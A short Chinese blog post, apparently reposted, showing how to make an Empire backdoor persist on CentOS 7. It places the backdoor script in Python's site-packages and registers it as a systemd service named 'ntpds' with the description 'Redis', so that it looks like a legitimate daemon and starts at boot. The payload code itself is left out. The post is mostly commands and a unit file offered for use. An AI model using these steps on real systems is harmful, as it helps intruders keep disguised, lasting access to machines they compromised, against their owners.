centos7下面利用服务启动empire后门的方法

时间：2020-01-08 11:44:57 阅读：138 评论：0 收藏：0 [点我收藏+]

//centos7下面利用服务启动empire后门的方法：

vi /usr/lib/python2.7/site-packages/pci.sh //放入empire后门
chmod 755 /usr/lib/python2.7/site-packages/pci.sh
cd /usr/lib/systemd/system
vi ntpds.service
chmod 755 ntpds.service
systemctl enable ntpds.service //设置开机启动
systemctl start ntpds.service
systemctl status ntpds.service

//pci.sh是empire后门代码：
#!/bin/sh
python后门代码略

//ntpds.service启动文件
[Unit]
Description=Redis
After=network.target remote-fs.target nss-lookup.target
 
[Service]
Type=forking
ExecStart=/usr/lib/python2.7/site-packages/pci.sh
ExecStop=
 
[Install]
WantedBy=multi-user.target

empire后门上线了：

技术分享图片

centos7下面利用服务启动empire后门的方法

原文：https://www.cnblogs.com/pt007/p/12165593.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)